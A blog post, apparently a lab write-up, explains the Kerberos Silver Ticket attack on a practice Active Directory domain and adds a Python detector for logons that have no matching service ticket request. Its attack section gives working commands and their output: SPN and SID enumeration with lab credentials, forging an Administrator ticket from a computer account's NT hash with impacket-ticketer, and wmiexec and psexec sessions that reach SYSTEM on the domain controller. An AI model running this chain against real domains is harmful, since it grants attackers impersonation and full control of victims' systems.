June 15, 2026
Active Directory Attacks — Silver Ticket Attack
Osec
A Silver Ticket attack is a Kerberos abuse technique where an attacker forges a valid service ticket (TGS) to authenticate directly to a specific service without contacting the Domain Controller (KDC).
What the attacker is taking advantage of
The attack exploits two key properties of Kerberos authentication:
1 - Service tickets (TGS) are validated locally
- When a client presents a TGS to a service (e.g., SMB, HTTP), the service does not contact the Domain Controller.
- It simply decrypts and verifies the ticket with its own long-term key, which is derived from the service account's password (its NTLM hash).
2 - Services trust tickets encrypted with their own key
- If an attacker knows the service account's NTLM hash, they can forge tickets that appear legitimate, including the PAC that carries the user's identity and group memberships.
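Because the target never consults the KDC, the domain controller has no record of the ticket ever being issued. That gives a defender something concrete to look for: a Kerberos network logon on the target host (event 4624, logon type 3, authentication package Kerberos) with no preceding service ticket request (event 4769) on any domain controller for that user, client address and service account. The following Python script is added here as an illustration and is not part of the original post; the event fields and the 600-minute default "Maximum lifetime for service ticket" are as documented by Microsoft, while the sample events and host names in SAMPLE_EVENTS are constructed.

```python
"""Correlate Kerberos logons on member servers against TGS requests logged by the DC.

Added example, not from the original post. A forged (Silver) ticket never touches
the KDC, so the target logs a Kerberos logon (4624) that no domain controller
ever explained with a service ticket request (4769).
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    event_id: int           # 4769 (DC: service ticket requested) or 4624 (host: logon)
    logged_on: str          # FQDN of the host that wrote the event
    time: datetime
    user: str               # TargetUserName; 4769 carries user@REALM
    source_ip: str          # IpAddress; 4769 usually uses the ::ffff: IPv4-mapped form
    service: str = ""       # 4769 ServiceName, i.e. the service account (HOST$)
    auth_package: str = ""  # 4624 AuthenticationPackageName
    logon_type: int = 0     # 4624 LogonType; 3 = network


def norm_user(name):
    """'user@REALM', 'DOMAIN\\user' and 'user' all compare equal, case-insensitively."""
    return name.split("@")[0].split("\\")[-1].lower()


def norm_ip(ip):
    """Strip the IPv4-mapped prefix the DC writes into 4769 IpAddress."""
    ip = ip.lower()
    return ip[7:] if ip.startswith("::ffff:") else ip


def unrequested_kerberos_logons(events, max_ticket_age_minutes=600):
    """Return 4624 Kerberos network logons that no earlier DC-side 4769 explains.

    A legitimately issued ticket can be reused for its whole lifetime, so the
    lookback must be at least the domain's service ticket lifetime (default 600 min).
    """
    window = timedelta(minutes=max_ticket_age_minutes)
    requests = [e for e in events if e.event_id == 4769]
    flagged = []
    for logon in events:
        if (logon.event_id != 4624 or logon.logon_type != 3
                or logon.auth_package.lower() != "kerberos"):
            continue
        # The host's own computer account is the service the ticket was cut for.
        service_account = logon.logged_on.split(".")[0].upper() + "$"
        explained = any(
            r.service.upper() == service_account
            and norm_user(r.user) == norm_user(logon.user)
            and norm_ip(r.source_ip) == norm_ip(logon.source_ip)
            and timedelta(0) <= logon.time - r.time <= window
            for r in requests
        )
        if not explained:
            flagged.append(logon)
    return flagged


# Constructed sample events (hosts and users borrowed from this post, times invented).
T = datetime(2026, 4, 4, 16, 0, 0)
SAMPLE_EVENTS = [
    # Normal flow: the DC issues a ticket for MS01, then MS01 sees the logon.
    Event(4769, "ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL", T,
          "htb-student_adm@INLANEFREIGHT.LOCAL", "::ffff:10.129.202.50",
          service="ACADEMY-EA-MS01$"),
    Event(4624, "ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL", T + timedelta(seconds=20),
          "htb-student_adm", "10.129.202.50", auth_package="Kerberos", logon_type=3),
    # Forged ticket: the DC never logged a 4769, yet the target accepts the logon.
    Event(4624, "ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL", T + timedelta(minutes=5),
          "Administrator", "10.10.14.5", auth_package="Kerberos", logon_type=3),
    # NTLM logon: not covered by this check.
    Event(4624, "ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL", T + timedelta(minutes=6),
          "svc_backup", "10.129.202.60", auth_package="NTLM", logon_type=3),
]

if __name__ == "__main__":
    for e in unrequested_kerberos_logons(SAMPLE_EVENTS):
        print(f"{e.time} {e.logged_on}: Kerberos logon by {e.user} from {e.source_ip} "
              "has no matching 4769 on the DC")
```

Two practical caveats: the 4769 events of every domain controller have to be collected, because any DC may have issued the ticket, and the lookback has to cover the domain's actual service ticket lifetime and renewal policy, otherwise ordinary ticket reuse shows up as a false positive.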
Enumeration
Silver Ticket enumeration is the process of identifying Kerberos services and their associated accounts in order to obtain the necessary material (hash + SPN + SID) to forge a service ticket.
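The ldapsearch output reproduced later in this section is plain LDIF, and LDIF folds long attribute values onto continuation lines that begin with a single space (the web copy of the output has lost that leading space, which is why some SPNs appear broken across two lines). The following Python script, added here as an example and not part of the original post, parses such output into an SPN inventory per account and lists the non-computer accounts that hold SPNs, since those are the accounts whose single password protects a service key. SAMPLE_LDIF is constructed from the shape of this post's output with one invented svc_sql entry added.

```python
"""Turn ldapsearch LDIF output into an SPN inventory (added example, not from the post)."""
import base64

# Constructed sample: shaped like the ldapsearch output in this post, plus one
# invented user account (svc_sql) so the non-computer-account check has a hit.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=INLANEFREIGHT,DC=LOCAL> with scope subtree
# filter: (servicePrincipalName=*)
# requesting: servicePrincipalName sAMAccountName
#

# ACADEMY-EA-DC01, Domain Controllers, INLANEFREIGHT.LOCAL
dn: CN=ACADEMY-EA-DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
sAMAccountName: ACADEMY-EA-DC01$
servicePrincipalName: TERMSRV/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.
 INLANEFREIGHT.LOCAL
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

# svc_sql, Service Accounts, INLANEFREIGHT.LOCAL (constructed entry)
dn: CN=svc_sql,OU=Service Accounts,DC=INLANEFREIGHT,DC=LOCAL
sAMAccountName: svc_sql
servicePrincipalName: MSSQLSvc/ACADEMY-EA-SQL01.INLANEFREIGHT.LOCAL:1433
"""


def parse_ldif(text):
    """Return one dict of attribute -> [values] per entry, unfolding continuation lines."""
    lines = []
    for raw in text.splitlines():
        # A line starting with a single space continues the previous attribute value.
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:          # trailing sentinel flushes the last entry
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")   # first colon only: SPNs may contain ':port'
        if value.startswith(":"):             # 'attr:: <base64>' form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(key.strip(), []).append(value.strip())
    return entries


def spn_inventory(text):
    """Map sAMAccountName -> sorted list of its SPNs."""
    inventory = {}
    for entry in parse_ldif(text):
        if "sAMAccountName" in entry:
            inventory[entry["sAMAccountName"][0]] = sorted(entry.get("servicePrincipalName", []))
    return inventory


def user_accounts_with_spns(inventory):
    """Accounts holding SPNs that are not computer accounts (no trailing '$')."""
    return sorted(name for name in inventory if not name.endswith("$"))


if __name__ == "__main__":
    inv = spn_inventory(SAMPLE_LDIF)
    for account, spns in inv.items():
        print(f"{account}: {len(spns)} SPN(s)")
    print("user accounts with SPNs:", user_accounts_with_spns(inv))
```

Run it against real ldapsearch output by replacing SAMPLE_LDIF with the saved file contents; the unfolding step is what makes the long Dfsr, GC and RPC SPNs from the post come out as single values again.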
Linux
enumerate SPNs
impacket-GetUserSPNs :
impacket-GetUserSPNs -dc-ip 10.129.202.146 INLANEFREIGHT.LOCAL/htb-student_adm:'Academy_student_DA!'

or ldapsearch :
ldapsearch -x -H ldap://10.129.202.146 \
-D "htb-student_adm@INLANEFREIGHT.LOCAL" -w 'Academy_student_DA!' \
-b "DC=INLANEFREIGHT,DC=LOCAL" \
"(servicePrincipalName=*)" servicePrincipalName sAMAccountName

enumerate SID
impacket-lookupsid INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL -k -no-pass
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] StringBinding ncacn_np:ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114

Windows
enumerate SPNs
setspn.exe -Q */*

enumerate SID
PS C:\Users\htb-student_adm> whoami /user
USER INFORMATION
----------------
User Name SID
============================= ==============================================
inlanefreight\htb-student_adm S-1-5-21-3842939050-3880317879-2865463114-5603

Examples:
linux :
ldapsearch -x -H ldap://10.129.202.146 -D "htb-student_adm@INLANEFREIGHT.LOCAL" -w 'Academy_student_DA!' -b "DC=INLANEFREIGHT,DC=LOCAL" "(servicePrincipalName=*)" servicePrincipalName sAMAccountName
# extended LDIF
#
# LDAPv3
# base <DC=INLANEFREIGHT,DC=LOCAL> with scope subtree
# filter: (servicePrincipalName=*)
# requesting: servicePrincipalName sAMAccountName
#
# ACADEMY-EA-DC01, Domain Controllers, INLANEFREIGHT.LOCAL
dn: CN=ACADEMY-EA-DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
sAMAccountName: ACADEMY-EA-DC01$
servicePrincipalName: exchangeAB/ACADEMY-EA-DC01
servicePrincipalName: exchangeAB/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: TERMSRV/ACADEMY-EA-DC01
servicePrincipalName: TERMSRV/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ACADEMY-EA-DC0
1.INLANEFREIGHT.LOCAL
servicePrincipalName: ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.
INLANEFREIGHT.LOCAL
servicePrincipalName: ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.
INLANEFREIGHT.LOCAL
servicePrincipalName: DNS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: GC/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOC
AL
servicePrincipalName: RestrictedKrbHost/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: RestrictedKrbHost/ACADEMY-EA-DC01
servicePrincipalName: RPC/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFR
EIGHT.LOCAL
servicePrincipalName: HOST/ACADEMY-EA-DC01/INLANEFREIGHT
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
servicePrincipalName: HOST/ACADEMY-EA-DC01
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.L
OCAL
...

windows :
PS C:\Users\htb-student_adm> setspn.exe -Q */*
Checking domain DC=INLANEFREIGHT,DC=LOCAL
CN=ACADEMY-EA-DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
exchangeAB/ACADEMY-EA-DC01
exchangeAB/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
TERMSRV/ACADEMY-EA-DC01
TERMSRV/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.INLANEFREIGHT.LOCAL
DNS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
GC/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-DC01
RPC/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFREIGHT.LOCAL
HOST/ACADEMY-EA-DC01/INLANEFREIGHT
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
HOST/ACADEMY-EA-DC01
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
E3514235-4B06-11D1-AB04-00C04FC2DCD2/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8/INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01/INLANEFREIGHT
ldap/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
ldap/ACADEMY-EA-DC01
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
kadmin/changepw
CN=ACADEMY-EA-MS01,OU=Web Servers,OU=Servers,OU=Computers,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
WSMAN/ACADEMY-EA-MS01
WSMAN/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
TERMSRV/ACADEMY-EA-MS01
TERMSRV/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
tapinego/ACADEMY-EA-MS01
tapinego/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-MS01
HOST/ACADEMY-EA-MS01
...PS C:\Users\htb-student_adm> setspn.exe -Q */*
Checking domain DC=INLANEFREIGHT,DC=LOCAL
CN=ACADEMY-EA-DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
exchangeAB/ACADEMY-EA-DC01
exchangeAB/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
TERMSRV/ACADEMY-EA-DC01
TERMSRV/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.INLANEFREIGHT.LOCAL
DNS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
GC/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-DC01
RPC/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFREIGHT.LOCAL
HOST/ACADEMY-EA-DC01/INLANEFREIGHT
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
HOST/ACADEMY-EA-DC01
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
E3514235-4B06-11D1-AB04-00C04FC2DCD2/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8/INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01/INLANEFREIGHT
ldap/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
ldap/ACADEMY-EA-DC01
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
kadmin/changepw
CN=ACADEMY-EA-MS01,OU=Web Servers,OU=Servers,OU=Computers,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
WSMAN/ACADEMY-EA-MS01
WSMAN/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
TERMSRV/ACADEMY-EA-MS01
TERMSRV/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
tapinego/ACADEMY-EA-MS01
tapinego/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-MS01
HOST/ACADEMY-EA-MS01
...

Attack
In a Silver Ticket attack, an attacker obtains the NTLM hash of a service account and uses it to forge a valid Kerberos service ticket (TGS) for a specific service, embedding any user identity and privileges they choose; they then present this forged ticket directly to the target service, which validates it locally using its own key and grants access — allowing the attacker to impersonate users without ever interacting with the Domain Controller.
Here's a concise checklist of prerequisites for a Silver Ticket attack:
- Access to a service account hash (NTLM hash of a machine or service account, e.g., WEB01$)
- Target SPN (the service you want to attack, e.g., cifs/web01.domain.local)
- Domain name (e.g., INLANEFREIGHT.LOCAL)
- Domain SID (e.g., S-1-5-21-XXXX-XXXX-XXXX)
- Knowledge of the username to impersonate (e.g., Administrator)
- Kerberos-aware tool to forge tickets (e.g., impacket-ticketer, Mimikatz)
- Network connectivity to the target service (SMB, WMI, HTTP, etc.)
These are all that's needed; no interaction with the Domain Controller is required.
demo time ;)
We did our enumeration and found that the computer account ACADEMY-EA-DC01 has several SPNs associated with it, including this one: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL.
We also have the NT hash of that computer account: 855ced84aa01080cee4fdbc755a08449.
So let's try to forge a ticket impersonating the Administrator user on the target service.
impacket-ticketer -nthash 855ced84aa01080cee4fdbc755a08449 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain INLANEFREIGHT.LOCAL -spn HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT Administrator
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for INLANEFREIGHT.LOCAL/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

We've successfully created the ticket for the Administrator user, and we saved it at /tmp/Administrator.ccache.
Now let's inject it into the current session (pass-the-ticket):

export KRB5CCNAME=/tmp/Administrator.ccache

verify:
klist
Ticket cache: FILE:/tmp/Administrator.ccache
Default principal: Administrator@INLANEFREIGHT.LOCAL
Valid starting Expires Service principal
04/04/2026 16:00:47 04/01/2036 16:00:47 HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL
renew until 04/01/2036 16:00:47

We now have a TGS for the service principal HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL, issued to the user Administrator@INLANEFREIGHT.LOCAL.
Note the validity period: the forged ticket expires in 2036, ten years after it was created, far beyond any domain's service ticket lifetime. That oversized lifetime is one of the things a forensic look at a host's ticket cache can reveal.
Don't forget to match the system clock with the DC, to avoid time-related Kerberos issues!
To match the system clock with the DC:

sudo ntpdate -u 10.129.202.146

Let's use that forged ticket.
wmiexec :
impacket-wmiexec -k -no-pass INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight.local\administrator

psexec :
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file ZNVUwYKU.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service hZWK on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service hZWK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system

Thanks for reading, I hope you've learned something new!
Make sure you subscribe so you get notified whenever a new article is dropped!
Follow me on X : https://x.com/osec403